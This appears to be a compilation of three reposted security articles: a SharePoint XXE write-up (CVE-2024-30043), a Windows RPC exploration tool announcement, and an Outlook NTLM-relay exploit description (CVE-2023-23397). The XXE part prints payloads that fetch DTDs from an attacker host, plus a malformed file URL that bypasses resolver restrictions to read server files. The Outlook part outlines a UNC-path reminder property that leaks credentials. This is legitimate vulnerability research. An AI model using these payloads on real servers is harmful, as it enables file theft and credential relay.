CVE-2024-30043: ABUSING URL PARSING CONFUSION TO EXPLOIT XXE ON SHAREPOINT SERVER AND CLOUD

CVE-2024-30043: ABUSING URL PARSING CONFUSION TO EXPLOIT XXE ON SHAREPOINT SERVER AND CLOUD

Original text by Piotr Bazydło

Yes, the title is right. This blog covers an XML eXternal Entity (XXE) injection vulnerability that I found in SharePoint. The bug was recently patched by Microsoft. In general, XXE vulnerabilities are not very exciting in terms of discovery and related technical aspects. They may sometimes be fun to exploit and exfiltrate data (or do other nasty things) in real environments, but in the vulnerability research world, you typically find them, report them, and forget about them.

So why am I writing a blog post about an XXE? I have two reasons:

·       It affects SharePoint, both on-prem and cloud instances, which is a nice target. This vulnerability can be exploited by a low-privileged user.
·       This is one of the craziest XXEs that I have ever seen (and found), both in terms of vulnerability discovery and the method of triggering. When we talk about overall exploitation and impact, this Pwn2Own win by Chris Anastasio and Steven Seeley is still my favorite.

The vulnerability is known as CVE-2024-30043, and, as one would expect with an XXE, it allows you to:

·       Read files with SharePoint Farm Service account permission.
·       Perform Server-side request forgery (SSRF) attacks.
·       Perform NTLM Relaying.
·       Achieve any other side effects to which XXE may lead.

Let us go straight to the details.

BaseXmlDataSource DataSource

Microsoft.SharePoint.WebControls.BaseXmlDataSource
 is an abstract base class, inheriting from 
DataSource
, for data source objects that can be added to a SharePoint Page. DataSource can be included in a SharePoint page, in order to retrieve data (in a way specific to a particular DataSource). When a 
BaseXmlDataSource
 is present on a page, its 
Execute
 method will be called at some point during page rendering:

protected XmlDocument Execute(string request) // [1]
{
    SPSite spsite = null;
    try
    {
        if (!BaseXmlDataSource.GetAdminSettings(out spsite).DataSourceControlEnabled)
        {
            throw new DataSourceControlDisabledException(SPResource.GetString("DataSourceControlDisabled", new object[0]));
        }
        string text = this.FetchData(request); // [2]
        if (text != null && text.Length > 0)
        {
            XmlReaderSettings xmlReaderSettings = new XmlReaderSettings();
            xmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit; // [3]
            XmlTextReader xmlTextReader = new XmlTextReader(new StringReader(text));
            XmlSecureResolver xmlResolver = new XmlSecureResolver(new XmlUrlResolver(), request); // [4]
            xmlTextReader.XmlResolver = xmlResolver; // [5]
            XmlReader xmlReader = XmlReader.Create(xmlTextReader, xmlReaderSettings); // [6]
            try
            {
                do
                {
                    xmlReader.Read(); // [7]
                }
                while (xmlReader.NodeType != XmlNodeType.Element);
            }
            ...
        }
        ...
    }
    ...
}

At 

[1]
, you can see the 
Execute
 method, which accepts a string called 
request
. We fully control this string, and it should be a URL (or a path) pointing to an XML file. Later, I will refer to this string as 
DataFile
.

At this point, we can derive this method into two main parts: XML fetching and XML parsing.

       a) XML Fetching

At 

[2]
this.FetchData
 is called and our URL is passed as an input argument. 
BaseXmlDataSource
 does not implement this method (it’s an abstract class). 

FetchData
 is implemented in three classes that extend our abstract class:
• 
SoapDataSource
 — performs HTTP SOAP request and retrieves a response (XML).
• 
XmlUrlDataSource
 — performs a customizable HTTP request and retrieves a response (XML).
• 
SPXmlDataSource
 — retrieves an existing specified file on the SharePoint site. 

We will revisit those classes later.

       b) XML Parsing

At 

[3]
, the 
xmlReaderSettings.DtdProcessing
 member is set to 
DtdProcessing.Prohibit
, which should disable the processing of DTDs. 

At 

[4]
 and 
[5]
, the 
xmlTextReader.XmlResolver
 is set to a freshly created 
XmlSecureResolver
. The 
request
 string, which we fully control, is passed as the 
securityUrl
 parameter when creating the 
XmlSecureResolver

At 

[6]
, the code creates a new instance of 
XmlReader
.

Finally, it reads the contents of the XML using a while-do loop at 

[7]
.

At first glance, this parsing routine seems correct. The document type definition (DTD) processing of our 

XmlReaderSettings
 instance is set to 
Prohibit
, which should block all DTD processing. On the other hand, we have the 
XmlResolver
 set to 
XmlSecureResolver
.

From my experience, it is very rare to see .NET code, where:
• DTDs are blocked through 

XmlReaderSettings
.
• Some 
XmlResolver
 is still defined. 

I decided to play around and sent in a general entity-based payload at some test code I wrote similar to the code shown above (I only replaced 

XmlSecureResolver
 with 
XmlUrlResolver
 for testing purposes):

<?xml version="1.0" ?>
<!DOCTYPE a [
<!ELEMENT a ANY >
<!ENTITY b SYSTEM "http://attacker/poc.txt">
]>
<r>&b;</r>

As expected, no HTTP request was performed, and a DTD processing exception was thrown. What about this payload?

<?xml version="1.0" ?>
<!DOCTYPE a [
<!ELEMENT a ANY >
<!ENTITY % sp SYSTEM "http://attacker/poc.xml">
%sp;
]>
<a>wat</a>

It was a massive surprise to me, but the HTTP request was performed! According to that, it seems that when you have .NET code where:
• 

XmlReader
 is used with 
XmlTextReader
 and 
XmlReaderSettings
.
• 
XmlReaderSettings.DtdProcessing
 is set to 
Prohibit
.
• An 
XmlTextReader.XmlResolver
 is set.

The resolver will first try to handle the parameter entities, and only afterwards will perform the DTD prohibition check! An exception will be thrown in the end, but it still allows you to exploit the Out-of-Band XXE and potentially exfiltrate data (using, for example, an HTTP channel).

The XXE is there, but we have to solve two mysteries:

• How can we properly fetch the XML payload in SharePoint?
• What’s the deal with this 

XmlSecureResolver
?

XML Fetching and XmlSecureResolver

As I have already mentioned, there are 3 classes that extend our vulnerable 

BaseXmlDataSource
. Their 
FetchData
 method is used to retrieve the XML content based on our URL. Then, this XML will be parsed with the vulnerable XML parsing code.

Let’s summarize those 3 classes:

       a) 

XmlUrlDataSource

       • Accepts URLs with a protocol set to either 

http
 or 
https
.
       • Performs an HTTP request to fetch the XML content. This request is customizable. For example, we can select which HTTP method we want to use.
       • Some SSRF protections are implemented. This class won’t allow you to make HTTP requests to local addresses such as 127.0.0.1 or 192.168.1.10. Still, you can use it freely to reach external IP address space. 

       b) 

SoapDataSource

       • Almost identical to the first one, although it allows you to perform SOAP requests only (body must contain valid XML, plus additional restrictions).
       • The same SSRF protections exist as in 

XmlUrlDataSource
.

       c) 

SPXmlDataSource

       • Allows retrieval of the contents of SharePoint pages or documents. If you have a file 

test.xml
 uploaded to the 
sample
 site, you can provide a URL as follows: 
/sites/sample/test.xml
.

At this point, those HTTP-based classes look like a great match. We can:
• Create an HTTP server.
• Fetch malicious XML from our server.
• Trigger XXE and potentially read files from SharePoint server. 

Let’s test this. I’m creating an 

XmlUrlDataSource
, and I want it to fetch the XML from this URL:

       

http://attacker.com/poc.xml

poc.xml
 contains the following payload:

<?xml version="1.0" ?>
<!DOCTYPE a [
<!ELEMENT a ANY >
<!ENTITY % sp SYSTEM "http://localhost/test">
%sp;
]>

The plan is simple. I want to test the XXE by executing an HTTP request to the localhost (SSRF). 

We must also remember that whatever URL that we specify as our source also becomes the 

securityUrl
 of the 
XmlSecureResolver
. Accordingly, this is what will be executed:

Figure 1 XmlSecureResolver initialization

Who cares anyway? YOLO and let’s move along with the exploitation. Unfortunately, this is the exception that appears when we try to execute this attack:

The action that failed was:
Demand
The type of the first permission that failed was:
System.Net. WebPermission
The first permission that failed was: <IPermission class="System.Net.WebPermission, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" version="1">
<ConnectAccess>
‹URI uri="http://localhost/test"/>
</ConnectAccess>
</IPermission>

Figure 2 Exception thrown during XXE->SSRF

It seems that “Secure” in 

XmlSecureResolver
 stands for something. In general, it is a wrapper around various resolvers, which allows you to apply some resource fetching restrictions. Here is a fragment of the Microsoft documentation:

“Helps to secure another implementation of XmlResolver by wrapping the XmlResolver object and restricting the resources that the underlying XmlResolver has access to.”

In general, it is based on Microsoft Code Access Security. Depending on the provided URL, it creates some resource access rules. Let’s see a simplified example for the 

http://attacker.com/test.xml
:

Figure 3 Simplified sample restrictions applied by XmlSecureResolver

In short, it creates restrictions based on protocol, hostname, and a couple of different things (like an optional port, which is not applicable to all protocols). If we fetch our XML from 

http://attacker.com
, we won’t be able to make a request to 
http://localhost
because the host does not match.

The same goes for the protocol. If we fetch XML from the attacker’s HTTP server, we won’t be able to access local files with XXE, because neither the protocol (

http://
 versus 
file://
) nor the host match as required.

To summarize, this XXE is useless so far. Even though we can technically trigger the XXE, it only allows us to reach our own server, which we can also achieve with the intended functionalities of our SharePoint sources (such as 

XmlDataSource
). We need to figure out something else.

SPXmlDataSource and URL Parsing Issues

At this point, I was not able to abuse the HTTP-based sources. I tried to use 

SPXmlDataSource
 with the following 
request
:

       

/sites/mysite/test.xml

The idea is simple. We are a SharePoint user, and we can upload files to some sites. We upload our malicious XML to the 

http://sharepoint/sites/mysite/test.xml
document and then we:
       • Create 
SPXmlDataSource

       • Set 
DataFile
 to 
/sites/mysite/test.xml
.

SPXmlDataSource
 will successfully retrieve our XML. What about 
XmlSecureResolver
? Unfortunately, such a path (without a protocol) will lead to a very restrictive policy, which does not allow us to leverage this XXE.

It made me wonder about the URL parsing. I knew that I could not abuse HTTP-based 

XmlDataSource
 and 
SoapDataSource
. The code was written in C# and it was pretty straightforward to read – URL parsing looked good there. On the other hand, the URL parsing of 
SPXmlDataSource
 is performed by some unmanaged code, which cannot be easily decompiled and read. 

I started thinking about a following potential exploitation scenario:
       • Delivering a “malformed” URL.
       • 

SPXmlDataSource
 somehow manages to handle this URL, and retrieves my uploaded XML successfully.
       • The URL gives me an unrestricted 
XmlSecureResolver
 policy and I’m able to fully exploit XXE.

This idea seemed good, and I decided to investigate the possibilities. First, we have to figure out when 

XmlSecureResolver
 gives us a nice policy, which allows us to:
       • Access a local file system (to read file contents).
       • Perform HTTP communication to any server (to exfiltrate data).

Let’s deliver the following URL to 

XmlSecureResolver
:

       

file://localhost/c$/whatever

Bingo! 

XmlSecureResolver
 creates a policy with no restrictions! It thinks that we are loading the XML from the local file system, which means that we probably already have full access, and we can do anything we want.

Such a URL is not something that we should be able to deliver to 

SPXmlDataSource
 or any other data source that we have available. None of them is based on the local file system, and even if they were, we are not able to upload files there.

Still, we don’t know how 

SPXmlDataSource
 is handling URLs. Maybe my dream attack scenario with a malformed URL is possible? Before even trying to reverse the appropriate function, I started playing around with this SharePoint data source, and surprisingly, I found a solution quickly:

       

file://localhost\c$/sites/mysite/test.xml

Let’s see how 

SPXmlDataSource
 handles it (based on my observations):

Figure 4 SPXmlDataSource — handling of malformed URL

This is awesome. Such a URL allows us to retrieve the XML that we can freely upload to SharePoint. On the other hand, it gives us an unrestricted access policy in 

XmlSecureResolver
! This URL parsing confusion between those two components gives us the possibility to fully exploit the XXE and perform a file read.

The entire attack scenario looks like this:

Figure 5 SharePoint XXE — entire exploitation scenario

Demo

Let’s have a look at the demo, to visualize things better. It presents the full exploitation process, together with the debugger attached. You can see that:
       • 

SPXmlDataSource
 fetches the malicious XML file, even though the URL is malformed.
       • 
XmlSecureResolver
 creates an unrestricted access policy.
       • XXE is exploited and we retrieve the 
win.ini
 file.
       • “DTD prohibited” exception is eventually thrown, but we were still able to abuse the OOB XXE.

The Patch

The patch from Microsoft implemented two main changes:
       • More URL parsing controls for 

SPXmlDataSource
.
       • 
XmlTextReader
 object also prohibits DTD usage (previously, only 
XmlReaderSettings
 did that).

In general, I find .NET XXE-protection settings way trickier than the ones that you can define in various Java parsers. This is because you can apply them to objects of different types (here: 

XmlReaderSettings
 versus 
XmlTextReader
). When 
XmlTextReader
prohibits the DTD usage, parameter entities seem to never be resolved, even with the resolver specified (that’s how this patch works). On the other hand, when 
XmlReaderSettings
 prohibits DTDs, parameter entities are resolved when the 
XmlUrlResolver
 is used. You can easily get confused here.

Summary

A lot of us thought that XXE vulnerabilities were almost dead in .NET. Still, it seems that you may sometimes spot some tricky implementations and corner cases that may turn out to be vulnerable. A careful review of .NET XXE-related settings is not an easy task (they are tricky) but may eventually be worth a shot.

I hope you liked this writeup. I have a huge line of upcoming blog posts, but vulnerabilities are waiting for the patches (including one more SharePoint vulnerability). Until my next post, you can follow me @chudypb and follow the team on TwitterMastodonLinkedIn, or Instagramfor the latest in exploit techniques and security patches.

Introducing RPC Investigator

Introducing RPC Investigator

Original text by Aaron LeMasters

Trail of Bits is releasing a new tool for exploring RPC clients and servers on Windows. RPC Investigator is a .NET application that builds on the NtApiDotNet platform for enumerating, decompiling/parsing and communicating with arbitrary RPC servers. We’ve added visualization and additional features that offer a new way to explore RPC.

RPC is an important communication mechanism in Windows, not only because of the flexibility and convenience it provides software developers but also because of the renowned attack surface its implementers afford to exploit developers. While there has been extensive research published related to RPC servers, interfaces, and protocols, we feel there’s always room for additional tooling to make it easier for security practitioners to explore and understand this prolific communication technology.

Below, we’ll cover some of the background research in this space, describe the features of RPC Investigator in more detail, and discuss future tool development.

If you prefer to go straight to the code, check out RPC Investigator on Github.

Background

Microsoft Remote Procedure Call (MSRPC) is a prevalent communication mechanism that provides an extensible framework for defining server/client interfaces. MSRPC is involved on some level in nearly every activity that you can take on a Windows system, from logging in to your laptop to opening a file. For this reason alone, it has been a popular research target in both the defensive and offensive infosec communities for decades.

A few years ago, the developer of the open source .NET library NtApiDotNet, James Foreshaw, updated his library with functionality for decompiling, constructing clients for, and interacting with arbitrary RPC servers. In an excellent blog post—focusing on using the new 

NtApiDotNet
 functionality via powershell scripts and cmdlets in his 
NtObjectManager
 package—he included a small section on how to use the powershell scripts to generate C# code for an RPC client that would work with a given RPC server and then compile that code into a C# application.

We built on this concept in developing RPC Investigator (RPCI), a .NET/C# Windows Forms UI application that provides a visual interface into the existing core RPC capabilities of the 

NtApiDotNet
 platform:

  • Enumerating all active ALPC RPC servers
  • Parsing RPC servers from any PE file
  • Parsing RPC servers from processes and their loaded modules, including services
  • Integration of symbol servers
  • Exporting server definitions as serialized .NET objects for your own scripting

Beyond visualizing these core features, RPCI provides additional capabilities:

  • The Client Workbench allows you to create and execute an RPC client binary on the fly by right-clicking on an RPC server of interest. The workbench has a C# code editor pane that allows you to edit the client in real time and observe results from RPC procedures executed in your code.
  • Discovered RPC servers are organized into a library with a customizable search interface, allowing you to pivot RPC server data in useful ways, such as by searching through all RPC procedures for all servers for interesting routines.
  • The RPC Sniffer tool adds visibility into RPC-related Event Tracing for Windows (ETW) data to provide a near real-time view of active RPC calls. By combining ETW data with RPC server data from 
    NtApiDotNet
    , we can build a more complete picture of ongoing RPC activity.

Features

Disclaimer: Please exercise caution whenever interacting with system services. It is possible to corrupt the system state or cause a system crash if RPCI is not used correctly.

Prerequisites and System Requirements

Currently, RPCI requires the following:

By default, RPCI will automatically discover the Debugging Tools for Windows installation directory and configure itself to use the public Windows symbol server. You can modify these settings by clicking 

Edit -&gt; Settings
. In the Settings dialog, you can specify the path to the debugging tools DLL (dbghelp.dll) and customize the symbol server and local symbol directory if needed (for example, you can specify the path 
srv*c:\symbols*https://msdl.microsoft.com/download/symbols
).

If you want to observe the debug output that is written to the RPCI log, set the appropriate trace level in the Settings window. The RPCI log and all other related files are written to the current user’s application data folder, which is typically 

C:\Users\(user)\AppData\Roaming\RpcInvestigator
. To view this folder, simply navigate to 
View -&gt; Logs
. However, we recommend disabling tracing to improve performance.

It’s important to note that the bitness of RPCI must match that of the system: if you run 32-bit RPCI on a 64-bit system, only RPC servers hosted in 32-bit processes or binaries will be accessible (which is most likely none).

Searching for RPC servers

The first thing you’ll want to do is find the RPC servers that are running on your system. The most straightforward way to do this is to query the RPC endpoint mapper, a persistent service provided by the operating system. Because most local RPC servers are actually ALPC servers, this query is exposed via the 

File -> All RPC ALPC Servers…
 menu item.

The discovered servers are listed in a table view according to the hosting process, as shown in the screenshot above. This table view is one starting point for navigating RPC servers in RPCI. Double-clicking a particular server will open another tab that lists all endpoints and their corresponding interface IDs. Double-clicking an endpoint will open another tab that lists all procedures that can be invoked on that endpoint’s interface. Right-clicking on an endpoint will open a context menu that presents other useful shortcuts, one of which is to create a new client to connect to this endpoint’s interface. We’ll describe that feature in a later section.

You can locate other RPC servers that are not running (or are not ALPC) by parsing the server’s image by selecting 

File -&gt; Load from binary…
 and locating the image on disk, or by selecting 
File-&gt;Load from service…
 and selecting the service of interest (this will parse all servers in all modules loaded in the service process).

Exploring the Library

The other starting point for navigating RPC servers is to load the library view. The library is a file containing serialized .NET objects for every RPC server you have discovered while using RPCI. Simply select the menu item 

Library -> Servers
 to view all discovered RPC servers and 
Library -> Procedures
 to view all discovered procedures for all server interfaces. Both menu items will open in new tabs. To perform a quick keyword search in either tab, simply right-click on any row and type a search term into the textbox. The screenshot below shows a keyword search for “()” to quickly view procedures that have zero arguments, which are useful starting points for experimenting with an interface.

The first time you run RPCI, the library needs to be seeded. To do this, navigate to 

Library -&gt; Refresh
, and RPCI will attempt to parse RPC servers from all modules loaded in all processes that have a registered ALPC server. Note that this process could take quite a while and use several hundred megabytes of memory; this is because there are thousands of such modules, and during this process the binaries are re-mapped into memory and the public Microsoft symbol server is consulted. To make matters worse, the Dbghelp API is single-threaded and I suspect Microsoft’s public symbol server has rate-limiting logic.

You can periodically refresh the database to capture any new servers. The refresh operation will only add newly-discovered servers. If you need to rebuild the library from scratch (for example, because your symbols were wrong), you can either erase it using the menu item 

Library -&gt; Erase
 or manually delete the database file (
rpcserver.db
) inside the current user’s roaming application data folder. Note that RPC servers that are discovered by using the 
File -&gt; Load from binary…
 and 
File -&gt; Load from service…
 menu items are automatically added to the library.

You can also export the entire library as text by selecting 

Library -&gt; Export as Text
.

Creating a New RPC Client

One of the most powerful features of RPCI is the ability to dynamically interact with an RPC server of interest that is actively running. This is accomplished by creating a new client in the Client Workbench window. To open the Client Workbench window, right-click on the server of interest from the library servers or procedures tab and select 

New Client
.

The workbench window is organized into three panes:

  • Static RPC server information
  • A textbox containing dynamic client output
  • A tab control containing client code and procedures tabs

The client code tab contains C# source code for the RPC client that was generated by 

NtApiDotNet
. The code has been modified to include a “Run” function, which is the “entry point” for the client. The procedures tab is a shortcut reference to the routines that are available in the selected RPC server interface, as the source code can be cumbersome to browse (something we are working to improve!).

The process for generating and running the client is simple:

  • Modify the “Run” function to call one or more of the procedures exposed on the RPC server interface; you can print the result if needed.
  • Click the “Run” button.
  • Observe any output produced by “Run”

In the screenshot above, I picked the “Host Network Service” RPC server because it exposes some procedures whose names imply interesting administrator capabilities. With a few function calls to the RPC endpoint, I was able to interact with the service to dump the name of what appears to be a default virtual network related to Azure container isolation.

Sniffing RPC Traffic with ETW Data

Another useful feature of RPCI is that it provides visibility into RPC-related ETW data. ETW is a diagnostic capability built into the operating system. Many years ago ETW was very rudimentary, but since the Endpoint Detection and Response (EDR) market exploded in the last decade, Microsoft has evolved ETW into an extremely rich source of information about what’s going on in the system. The gist of how ETW works is that an ETW provider (typically a service or an operating system component) emits well-structured data in “event” packets and an application can consume those events to diagnose performance issues.

RPCI registers as a consumer of such events from the Microsoft-RPC (MSRPC) ETW provider and displays those events in real time in either table or graph format. To start the RPC Sniffer tool, navigate to 

Tools -&gt; RPC Sniffer…
 and click the “play” button in the toolbar. Both the table and graph will be updated every few seconds as events begin to arrive.

The events emitted by the MSRPC provider are fairly simple. The events record the results of RPC calls between a client and server in RpcClientCall and RpcServerCall start and stop task pairs. The start events contain detailed information about the RPC server interface, such as the protocol, procedure number, options, and authentication used in the call. The stop events are typically less interesting but do include a status code. By correlating the call start/stop events between a particular RPC server and the requesting process, we can begin to make sense of the operations that are in progress on the system. In the table view, it’s easier to see these event pairs when the ETW data is grouped by ActivityId (click the “Group” button in the toolbar), as shown below.

The data can be overwhelming, because ETW is fairly noisy by design, but the graph view can help you wade through the noise. To use the graph view, simply click the “Node” button in the toolbar at any time during the trace. To switch back to the table view, click the “Node” button again.

A long-running trace will produce a busy graph like the one above. You can pan, zoom, and change the graph layout type to help drill into interesting server activity. We are exploring additional ways to improve this visualization!

In the zoomed-in screenshot above, we can see individual service processes that are interacting with system services such as Base Filtering Engine (BFE, the Windows Defender firewall service), NSI, and LSASS.

Here are some other helpful tips to keep in mind when using the RPC Sniffer tool:

  • Keep RPCI diagnostic tracing disabled in Settings.
  • Do not enable ETW debug events; these produce a lot of noise and can exhaust process memory after a few minutes.
  • For optimum performance, use a release build of RPCI.
  • Consider docking the main window adjacent to the sniffer window so that you can navigate between ETW data and library data (right-click on a table row and select 
    Open in library
     or click on any RPC node while in the graph view).
  • Remember that the graph view will refresh every few seconds, which might cause you to lose your place if you are zooming and panning. The best use of the graph view is to take a capture for a fixed time window and explore the graph after the capture has been stopped.

What’s Next?

We plan to accomplish the following as we continue developing RPCI:

  • Improve the code editor in the Client Workbench
  • Improve the autogeneration of names so that they are more intuitive
  • Introduce more developer-friendly coding features
  • Improve the coverage of RPC/ALPC servers that are not registered with the endpoint mapper
  • Introduce an automated ALPC port connector/scanner
  • Improve the search experience
  • Extend the graph view to be more interactive

Related Research and Further Reading

Because MSRPC has been a popular research topic for well over a decade, there are too many related resources and research efforts to name here. We’ve listed a few below that we encountered while building this tool:

If you would like to see the source code for other related RPC tools, we’ve listed a few below:

If you’re unfamiliar with RPC internals or need a technical refresher, we recommend checking out one of the authoritative sources on the topic, Alex Ionescu’s 2014 SyScan talk in Singapore, “All about the RPC, LRPC, ALPC, and LPC in your PC.”

Exploiting CVE-2023-23397: Microsoft Outlook Elevation of Privilege Vulnerability

Microsoft Outlook Elevation of Privilege Vulnerability windows

Original text by Dominic Chell

Today saw Microsoft patch an interesting vulnerability in Microsoft Outlook. The vulnerability is described as follows:

Microsoft Office Outlook contains a privilege escalation vulnerability that allows for a NTLM Relay attack against another service to authenticate as the user.

However, no specific details were provided on how to exploit the vulnerability.

At MDSec, we’re continually looking to weaponise both private and public vulnerabilities to assist us during our red team operations. Having recently given a talk on leveraging NTLM relaying during red team engagements at FiestaCon, this vulnerability particularly stood out to me and warranted further analysis.

While no particular details were provided, Microsoft did provide a script to audit your Exchange server for mail items that might be being used to exploit the issue.

Review of the audit script reveals it is specifically looking for the PidLidReminderFileParameterproperty inside the mail items and offers the option to “clean” it if found:

Diving in to what this property is, we find the following definition:

This property controls what filename should be played by the Outlook client when the reminder for the mail item is triggered. This is of course particularly interesting as it implies that the property accepts a filename, which of could potentially be a UNC path in order to trigger the NTLM authentication.

Following further analysis of the available properties, we also note the PidLidReminderOverride property which is described as follows:

With this in mind, we should likely set the PidLidReminderOverride property in order to trigger Outlook to parse our malicious UNC inside PidLidReminderFileParameter.

Let’s begin to build an exploit….

The first step to exploit this issue is to create an Outlook MSG file; these files are compound files in CFB format. To speed up the generation of these files, I leveraged the .NET MsgKit library.

Reviewing the MsgKit library, we find that the Appointment class defines a number of properties to add to the mail item before the MSG file is saved:

To create our malicious calendar appointment, I extended the Appointment class to add our required PidLidReminderOverride and PidLidReminderFileParameter properties, as shown above.

From that point, we simply need to create a new appointment and save it, before sending to our victim:

This vulnerability is particularly interesting as it will trigger NTLM authentication to an IP address (i.e. a system outside of the Trusted Intranet Zone or Trusted Sites) and this occurs immediately on opening the e-mail, irrespective of whether the user has selected the option to load remote images or not.

This one is worth patching as a priority as its incredibly easy to exploit and will no doubt be adopted by adversaries fast.

Here’s a demonstration of our exploit which will relay the incoming request to LDAP to obtain a shadow credential: